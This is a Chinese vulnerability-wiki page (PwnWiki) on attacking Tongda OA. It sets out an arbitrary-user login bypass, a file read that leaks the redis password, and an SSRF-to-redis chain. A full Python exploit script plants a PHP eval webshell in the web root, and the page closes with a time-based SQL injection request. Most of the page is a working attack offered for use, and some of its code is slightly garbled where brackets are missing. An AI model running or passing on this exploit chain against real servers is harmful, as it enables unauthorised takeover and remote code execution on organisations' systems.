免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
漏洞利用
通达OA 任意用户登陆条件需要管理员在线。
http://192.168.1.22/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
访问路径,覆盖了session直接用cookie登陆,访问目录/general/进入后台。
如果什么都没有返回,那么就利用当前的phpsessid进行访问。
获取安装目录读取redis 配置文件:
/general/approve_center/archive/getTableStruc.php
任意文件读取:
/ispirit/im/photo.php?AVATAR_FILE=D:/MYOA/bin/redis.windows.conf&UID=2
读取到redis 密码。然后通过ssrf:
/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=gopher://127.0.0.1:6399/
EXP
# -*- coding:utf-8 -*-
import os
import requests
import re
# author :print("")
import urllib
class GenerateUrl:
def __init__(self, password, webroot, filename):
self.password = password
self.webroot = webroot
self.filename = filename
self.webshell = '''
<?php file_put_contents('11.php',base64_decode('PD9waHAgQGV2YWwoJF9HRVRbMV0pPz4='))?>
'''
self.template = '''_*2
$4
AUTH
${password_len}
{password}
*1
$8
flushall
*4
$6
CONFIG
$3
SET
$10
dbfilename
${filename_len}
{filename}
*4
$6
CONFIG
$3
SET
$3
dir
${webroot_len}
{webroot}
*3
$3
SET
$1
1
${content_len}
{content}
*1
$4
save
*1
$4
quit
'''
def __str__(self):
webshell = self.webshell
webshell = webshell.replace('"', '%22').replace("'", '%27').replace(",", "%2c")
webshell = webshell.replace(' ', '%20').replace('\n', '%0D%0A').replace('<', '%3c').replace('?', '%3f').replace(
'>', '%3e')
self.template = self.template.replace("{password_len}", str(len(self.password)))
self.template = self.template.replace("{password}", self.password)
self.template = self.template.replace("{filename_len}", str(len(self.filename)))
self.template = self.template.replace("{filename}", self.filename)
self.template = self.template.replace("{webroot_len}", str(len(self.webroot)))
self.template = self.template.replace("{webroot}", self.webroot)
self.template = self.template.replace("{content_len}", str(len(self.webshell)))
self.template = self.template.replace("{content}", webshell)
self.template = self.template.replace('\n', '%0D%0A')
return urllib.quote_plus(self.template)
proxies = {
"http": "http://127.0.0.1:8080",
"https": "http://127.0.0.1:8080",
}
def headers(phpsesion):
return {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.6) ",
"Cookie": phpsesion
}
# 获取绝对目录
def get_path(url, headers):
urlc = url
url = (url + '/general/approve_center/archive/getTableStruc.php')
try:
data = requests.get(url=url, headers=headers, proxies=proxies).json()
path = data'logPath'.split('\\')0
url2 = urlc + '/ispirit/im/photo.php?AVATAR_FILE=%s/bin/redis.windows.conf&UID=2' % path
data2 = requests.get(url=url2, headers=headers, proxies=proxies)
ress = re.search('requirepass .+', data2.text).group()
return {"path": path, "redis_pass": ress.replace('requirepass ', '').strip()}
except:
exit('ERROR Cookie PHPSESSID expired')
# ssrf写入文件
def ssrf_webshell(url, path, password):
urlc = url
path = path
password = password
a = GenerateUrl(password, path + "/webroot/", "666.php")
url = url + '/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=%s' % ('gopher://127.0.0.1:6399/' + str(a))
data = requests.get(url=url, headers=headers, proxies=proxies)
ddd = requests.get(url=urlc + '/666.php')
if ddd.status_code == 200:
print('shell url:%s' % urlc + '/666.php')
else:
print('send shell ERROR')
return True
def get_cookie(url):
url = url+ "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
}
try:
response = requests.get(url=url, headers=headers)
if "RELOGIN" in response.text and response.status_code == 200:
exit("目标用户为离线状态")
elif response.status_code == 200 and response.text == "":
print("好了马上就能getshell了")
cookies = response.cookies
cookie = requests.utils.dict_from_cookiejar(cookies)
if cookie'SESSIONID':
return cookie'SESSIONID'
else:
exit('实在抱歉,getshell不了')
else:
print("未知错误,目标可能不存在或不存在该漏洞")
except Exception as e:
exit('实在抱歉,getshell不了')
if __name__ == '__main__':
import sys
try:
url = sys.argv1
cookie =get_cookie(url)
headers = headers(cookie)
root_path = get_path(url, headers)
ssrf_webshell(url, root_path'path', root_path'redis_pass')
except:
print('python tongda.py http://127.0.0.1')
SQL
POST /general/appbuilder/web/officeproduct/productapply/applyprobygroup HTTP/1.1 Host: 10.211.55.5 Content-Length: 39 Accept: */* DNT: 1 X-Requested-With: XMLHttpRequest UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.103 Safar i/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://10.211.55.5 Referer: http://10.211.55.5/general/officeProduct/product_apply/index.php Accept-Language: en,zh-CN;q=0.9,zh;q=0.8 Cookie: SID_12=530bf0a5; SID_27=7202df24; USER_NAME_COOKIE=admin; OA_USER_ID=admin; PHPSESSID=1plu8qbupnesf40l9d02fdlvm5 ; SID_1=24205621 Connection: close arr5pro_id=151';select sleep(3) %23
pwnwiki.com
